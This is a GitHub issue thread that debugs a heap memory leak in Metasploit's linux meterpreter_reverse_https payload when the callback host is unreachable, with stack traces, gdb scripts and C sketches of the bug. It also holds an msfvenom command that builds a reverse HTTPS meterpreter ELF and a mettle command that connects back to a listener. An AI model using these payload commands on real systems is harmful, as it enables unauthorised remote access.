rapid7 / metasploit-framework

Memory leak on linux/meterpreter_reverse_https payload #18342

Closed: mnihyc closed this issue 1 month ago

mnihyc commented 1 year ago

Steps to reproduce

Simply follow the usual procedure:

  1. Generate a linux/meterpreter_reverse_https ELF payload with msfvenom.
  2. Start the handler in msfconsole and run the payload; the session is established as expected.
  3. Exit msfconsole with exit -y, keeping the meterpreter process running.

Expected behavior

Meterpreter should be able to reconnect at any time after msfconsole is started again.

Current behavior

After several hours (ranging from ten minutes to half a day depending on the environment), meterpreter suddenly begins consuming memory at intervals and is eventually OOM-killed by the OS. By looking at the process's proc maps, I observed that the allocations happen on the heap. Setting LHOST to localhost seems to accelerate this process.

Meanwhile, msfconsole will not receive any requests from meterpreter from then on.

Or, in some cases, the connection is received but a session cannot be established, with the following error recorded:

/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:269:in `send_e404'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:374:in `dispatch_request'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:303:in `on_client_data'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:162:in `block in start'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:42:in `on_client_data'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:185:in `block in monitor_clients'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:184:in `each'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:184:in `monitor_clients'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:64:in `block in start'
/opt/metasploit-framework/embedded/framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[09/03/2023 20:46:45] [e(0)] rex: Failed to find handler for resource: /qIuqu9IZXtLvmumYi26kww8cb3ZwjcbaK8Mygu1lIliHX/
[09/03/2023 20:46:45] [e(0)] core: Error in stream server client monitor: undefined method `html_escape' for #<Rex::Proto::Http::Server https://0.0.0.0:8443 [ "/qIuqu9IZXtLvmumYi26QZwqcRKYGYKqPA4adX9K81pBz_MS4mlaS92a4Zny17sy5LWU7n/" ]>
Did you mean?  html_safe?

Documentation

I was trying to set up a persistent meterpreter session following the official documentation, but failed from the very beginning: meterpreter itself crashes (due to OOM) before any of the timeouts can even be reached!

Metasploit version

Latest as of writing, 6.3.32-dev-

dwelch-r7 commented 1 year ago

Hi @mnihyc, thanks for raising this issue. Could you let us know what OS the target machine was running? Could you also include the output of the debug command in msfconsole? Even though you're creating the payload with msfvenom, it would be nice for us to see all the handler options that have been set.

Setting LHOST to localhost seems to accelerate this process

This is pretty interesting. I'd need more info to confirm, but I suspect localhost resolves immediately so the payload retries quickly, while another LHOST address takes longer to resolve (or doesn't resolve at all), so each iteration of the loop takes longer. That's likely not the source of the issue anyway, but it's just a stab in the dark.

mnihyc commented 1 year ago

@dwelch-r7 Hello, thank you for pointing this out. I'm testing with Ubuntu 22.04 x64, and I believe this is a universal issue.

After further diagnosis, I found that the memory leak occurs specifically when the host meterpreter connects back to is unreachable: either LHOST itself is unreachable, or, if LHOST is a domain name, the DNS provider is not working. My previous guess about "localhost" appears to be wrong; the real cause is more likely that I'm on a poor Internet connection.

Based on this discovery, the issue is incredibly simple to trigger: set LHOST to an unreachable IP and meterpreter will consume memory indefinitely. This can be done without any interaction with msfconsole.

A basic example would be: msfvenom -p linux/x64/meterpreter_reverse_https LHOST=9.8.7.6 LPORT=8443 -f elf -o rev

Running the generated program, memory usage can be seen to increase rapidly. The same applies to the http payload, but not to tcp.

Because I typically use domain names as LHOST, this issue is critical for me, as meterpreter is likely to be OOM-killed before a DNS change has propagated.

Since the leak happens on the heap, I set breakpoints on malloc/calloc and obtained the following suspicious call stacks:

#0  0x00007f9893c8af80 in malloc ()
#1  0x00007f9893c8b5a9 in __malloc0 ()
#2  0x00005555574cb368 in ?? ()
#3  0x00007f9893c228e5 in Curl_open ()
#4  0x00007f9893c216fb in curl_easy_init ()
#5  0x00007f9893c48724 in Curl_conncache_init ()
#6  0x00007f9893c31e51 in Curl_multi_handle ()
#7  0x00007f9893c21877 in curl_easy_perform ()
#8  0x00007f9893c0dbec in request ()
#9  0x00007f9893c6f17a in etp_proc ()
#10 0x00007f9893c9cbc2 in start ()
#11 0x0000000000000000 in ?? ()

and

#0  0x00007f9893c8af80 in malloc ()
#1  0x00007f9893c8b5a9 in __malloc0 ()
#2  0x0000555557d028c0 in ?? ()
#3  0x00007f9893c0deee in http_request ()
#4  0x00007f9893c0a4da in http_poll_timer_cb ()
#5  0x00007f9893c707f8 in ev_invoke_pending ()
#6  0x00007f9893c729a9 in ev_run ()
#7  0x00007f9893c09c29 in mettle_start ()
#8  0x00007f9893c08e8e in main ()

Given my limited understanding of the meterpreter source code, I suspect some logic error is causing meterpreter to issue requests forever without ever closing them correctly.
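
For illustration, here is a minimal, self-contained libev sketch of the pattern the two call stacks above suggest. This is not mettle's actual code: the struct and function names (fake_conn, request_completed, poll_timer_cb) are invented, and it only mimics the suspected shape of the bug, where per-request state is allocated on every poll tick but freed only in a completion path that never runs while the target is unreachable.

  /* Build with: cc leak_sketch.c -lev */
  #include <ev.h>
  #include <stdlib.h>

  struct fake_conn {               /* stand-in for a per-request heap object */
      char buf[8192];
  };

  static int target_reachable = 0; /* flip to 1 and the "leak" disappears */

  static void request_completed(struct fake_conn *c)
  {
      free(c);                     /* the only place the state is released */
  }

  static void poll_timer_cb(struct ev_loop *loop, ev_timer *w, int revents)
  {
      (void)loop; (void)w; (void)revents;

      /* Like http_poll_timer_cb -> http_request in the second stack trace:
       * every tick creates a new request and its heap allocation. */
      struct fake_conn *c = calloc(1, sizeof(*c));

      /* If the request never completes (unreachable LHOST, dead DNS),
       * the completion path never runs and the allocation is never freed. */
      if (target_reachable)
          request_completed(c);
  }

  int main(void)
  {
      struct ev_loop *loop = EV_DEFAULT;
      ev_timer poll_timer;

      ev_timer_init(&poll_timer, poll_timer_cb, 0., 0.1); /* fire every 100 ms */
      ev_timer_start(loop, &poll_timer);
      ev_run(loop, 0);             /* watch RSS climb while this runs */
      return 0;
  }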

adfoster-r7 commented 1 year ago

@mnihyc Interesting! You might also be interested in the source code over here if you want to dig deeper:

https://github.com/rapid7/mettle/blob/7274a2413952be0c612fcacf2eb1cc1119c2b840/mettle/src/http_client.c#L205

mnihyc commented 1 year ago

@adfoster-r7 Thank you for letting me know that.

Just to add: once the leaked memory grows to a certain size, around 500 MB, the session can no longer be established even though meterpreter is still running. If this is the first connection, msfconsole shows an endless stream of "Redirecting stageless connection" messages at rapid speed. Otherwise, msfconsole simply reports "session is not valid and will be closed" after a few seconds, and "failed to negotiate TLV encryption" appears in the debug log.

So I'm confident the leak is also breaking normal functionality in some way.

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

gnusec commented 10 months ago

Has anyone fixed this yet? @mnihyc @adfoster-r7

Jemmy1228 commented 10 months ago

@mnihyc @adfoster-r7 @gnusec I spent some time debugging this and have some clues about the bug. My conclusion is that most requests (i.e. eio_req structures) are stuck in the eio_pool in the ready state: they have been submitted but have not yet entered the execution phase.

In general, every request goes through http_request() => eio_custom(...) => eio_submit(...) and then waits to be dispatched. (The memory is allocated in http_request.)

When a request is dispatched, the function pointer passed to eio_custom, i.e. request, is called; request(...) then calls request_done(...) => http_conn_free(...) to free the allocated memory, regardless of whether the HTTP request succeeded or not.

However, it seems that most requests never get dispatched (request is never executed), so request_done and http_conn_free are never called to free the allocated memory either.
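
To make that concrete, here is a self-contained C sketch of the backlog described above (submit_request and dispatch_one are invented names, and the http_conn struct here is just a stand-in; they only mimic the http_request / request_done / http_conn_free chain): every submitted request carries a heap allocation that is released only when the request is dispatched, so if dispatch falls behind, the ready queue and the heap grow without bound.

  #include <stdio.h>
  #include <stdlib.h>

  struct http_conn {                   /* allocated in the submit path */
      char payload[8192];
      struct http_conn *next;
  };

  static struct http_conn *ready_queue;   /* stand-in for eio's ready pool */
  static size_t nready;

  /* "http_request": allocate per-request state and queue it for execution. */
  static void submit_request(void)
  {
      struct http_conn *c = calloc(1, sizeof(*c));
      c->next = ready_queue;
      ready_queue = c;
      nready++;
  }

  /* "request_done" -> "http_conn_free": runs only when a request is dispatched. */
  static void dispatch_one(void)
  {
      struct http_conn *c = ready_queue;
      if (!c)
          return;
      ready_queue = c->next;
      nready--;
      free(c);                         /* the only place the memory is released */
  }

  int main(void)
  {
      for (unsigned tick = 0; tick < 100000; tick++) {
          submit_request();            /* the poll timer keeps submitting... */
          if (tick % 100 == 0)
              dispatch_one();          /* ...but dispatch happens far less often */
      }
      printf("requests still sitting in the ready queue: %zu\n", nready);
      return 0;
  }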

I used a gdb command script to debug the generated payload: gdb --command={commandFile} {executable} {executablePid}. Here's the command file I used; you may need to adjust some offsets if it doesn't work.

  b *(http_request+0x34)
  commands
  printf "http_request() = 0x%016llx\n", $rax
  continue
  end

  b eio_custom
  commands
  printf "submit(0x%016llx)\n", $rcx
  continue
  end

  b *(request+0x5)
  commands
  printf "request(0x%016llx)\n", $rbx
  continue
  end

  b *(request_done+0x5)
  commands
  printf "done(0x%016llx)\n", $rbx
  continue
  end

  b http_conn_free
  commands
  printf "free(0x%016llx)\n", $rdi
  continue
  end

  continue

The output contains a lot of http_request() = 0xXXXXXXXXXXXXXXXX and submit(0xXXXXXXXXXXXXXXXX) lines, which means many eio_reqs are successfully created and submitted to libeio.

Only a few request(0xXXXXXXXXXXXXXXXX), done(0xXXXXXXXXXXXXXXXX), and free(0xXXXXXXXXXXXXXXXX) lines appear, which means most requests are stuck in the ready state and have not yet entered the execution phase.

By viewing the eio_pool variable (the value returned by eio_nready()) in gdb, I have confirmed my guess: eio_pool grows continuously, and memory consumption increases as the pool gets larger.
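
As a possible alternative to poking at eio_pool with gdb: libeio exposes counter functions (eio_nreqs, eio_nready, eio_npending) that make the backlog visible directly. The hook below is hypothetical and would have to be added to a rebuilt mettle (or any other libeio consumer); calling it periodically, e.g. from the poll timer, should show nready climbing in step with heap usage if the diagnosis above is right.

  /* Hypothetical diagnostic hook, not present in mettle today. */
  #include <stdio.h>
  #include <eio.h>

  void log_eio_counters(void)
  {
      fprintf(stderr, "eio: nreqs=%u nready=%u npending=%u\n",
              eio_nreqs(),     /* requests currently in flight                 */
              eio_nready(),    /* submitted but not yet picked up by a worker  */
              eio_npending()); /* finished, waiting for their callbacks to run */
  }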

But I have no clue how to fix this problem, and I don't know how to integrate mettle with msfconsole to check whether a fix works.

adfoster-r7 commented 10 months ago

Thanks for taking a look! :+1:

Mettle can be built locally, either on your host machine or via Docker: https://github.com/rapid7/mettle

Once the payload is built, it should produce a usable ELF file that you can execute directly. IIRC it's something like:

$ ./build_triple -h
Usage: mettle [options]
  -h, --help             display help
  -u, --uri <uri>        add connection URI
  -U, --uuid <uuid>      set the UUID (base64)
  -d, --debug <level>    enable debug output (set to 0 to disable)
  -o, --out <file>       write debug output to a file
  -b, --background <0|1> start as a background service (0 disable, 1 enable)
  -p, --persist [none|install|uninstall] manage persistence
  -m, --modules <path>   add modules from path
  -n, --name <name>      name to start as
  -l, --listen
  -c, --console

And connecting the newly built Mettle binary back to an already running msfconsole listener looks something like:

./build_triple --debug 3 --uri tcp://x.x.x.x:4444

adfoster-r7 commented 9 months ago

This is being tracked over here: https://github.com/rapid7/mettle/pull/253

github-actions[bot] commented 5 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
